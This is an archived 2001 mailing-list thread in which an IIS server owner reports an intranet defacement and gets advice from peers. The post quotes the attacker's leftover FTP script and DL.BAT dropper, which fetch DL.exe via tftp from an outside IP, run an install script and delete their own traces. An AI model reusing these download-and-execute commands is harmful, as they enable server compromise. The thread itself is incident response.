THIS IS A GREAT LIST. It really make one feel that we are not alone when
trouble strikes.
I wanted to share some of my findings with the help of Ben, Razzak, Chuck, Mike,
Troy, Jeff and and everyone else that responded to my post.
The IS log file [in010505.log] reveal the attack to come from IP
202.229.95.153. Indeed they use cmd.exe and root.exe on my NT server to do
their dirty deed.
NOTE: On my workstation browser I cannot get rid of the nasty page when I
re-log to my Intranet. Even if I reload or [F5], it fails to read the new
default.htm page I placed. This does not occur with Netscape. With Netscape
when I reload or [Ctrl]R it reads the new default.htm from my server eliminating
the nasty filthy page they used. I had to go into internet options and delete
all the internet temporary files before it properly reloaded.
Does anyone know why this would happen?
All I need if for a potential customer to have visited my Intranet defalut.htm
page and for the profanity to remain in their system forever!!
Ben, In my directory: c:\inetpub\scripts\ directory there is a whole lot of
file beside the four you mentioned.
I have no idea if they were there before or not. Like an idiot I never made a
back up of this particular directory. Two of them are very suspicious.
ftpcmds.txt looks like a script file that goes something like:
---------------------------------------------
open 208.184.26.169.29292
user DL
DL
get 00.D
get 01.D
.
.
.
bye
----------------------------------------------
there was also a DL.BAT file with stuff like:
startDL:
tftp.exe -i 216.205.125.115 get DL.exe
ren 00.D install.bat
attrib tftp* -r
attrib DL.exe -r
del TFTP*
DEL DL.exe
install.bat %1 exit
-----------------------------------------------
Again I do not know if these file were there before the attack. If anyone know
if they had files like these in there script directory, please let me know. For
now there have been deleted.
Although I feel this subject matter is very relevant to everyone on the list
server, it is limited to those using Tango with a server presence on the
Internet.
I will not continue to post concerning this issues. I will be happy to share
what I find if you contact me privately at [EMAIL PROTECTED]
THANK AGAIN TO ALL WHO RESPONDED and thank you Ben for your phone call it was
most kind.
Manuel de Aguiar
Ben Johansen wrote:
> Hi Manual,
>
> Just dealt with that myself last weekend, someone called china-boy, I have a
> love/hate feeling for this guy, I love him for bringing to light just how
> open MS leaves you, I Hate him for doing it. All he did was write over the
> home page and I fixed it sunday before any saw.
>
> Look in your Inetpub\scripts folder for any files that aren't supposed to be
> there. most likely in your case the only files should be
>
> t3cgi.exe or t4cgi.exe
> t3iis.dll or t4iis.dll
>
> china-boy placed a file called "Hackercn.exe" there in mine.
>
> Also check the logs to learn how the hacker did it.
>
> Here is a link to a check-list that helped my learn just what is needed to
> get secure.
> http://www.microsoft.com/technet/security/iischk.asp
>
> Now I feel 100% better about security
>
> Ben Johansen
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On
> Behalf Of Manuel de Aguiar
> Sent: Wednesday, May 09, 2001 1:19 PM
> To: [EMAIL PROTECTED]
> Subject: Security breach
>
> Hello Everyone,
>
> Someone broke into my intranet and replace the default.htm with a page
> that displays an obsenity. They also replaced or installed default.asp
> with the same page discussting page.
> The new page has an email on that could lead to this sick individual.
> Does anyone know if there are any goverment agencies that investigate
> this type of activity?
>
> Any information would be appreciated.
> Manuel
begin:vcard
n:de Aguiar;Manuel
tel;fax:(323)661-7698
tel;work:(323)660-3511
x-mozilla-html:FALSE
url:http://www.mdenterprises.net
org:M|D Enterprises
adr:;;2412 No. Commonwealth Avenue;Los Angeles;California;90027-1206;USA
version:2.1
email;internet:[EMAIL PROTECTED]
title:Developer
note;quoted-printable:The information contained in this e-mail may be privileged, confidential,=0D=0Aand protected from disclosure. If you are not the intended recipient, you=0D=0Aare hereby notified that any dissemination, distribution or duplication of=0D=0Athis communication is strictly prohibited. If you have received this=0D=0Acommunication in error, please notify the sender immediately and delete all=0D=0Acopies.=0D=0A=0D=0Ahttp://www.mdenterprises.net=0D=0Ahttp:/www.databasedeveloper.com=0D=0Ahttp://www.MdrBASE.com=0D=0A
x-mozilla-cpt:;-1
end:vcard
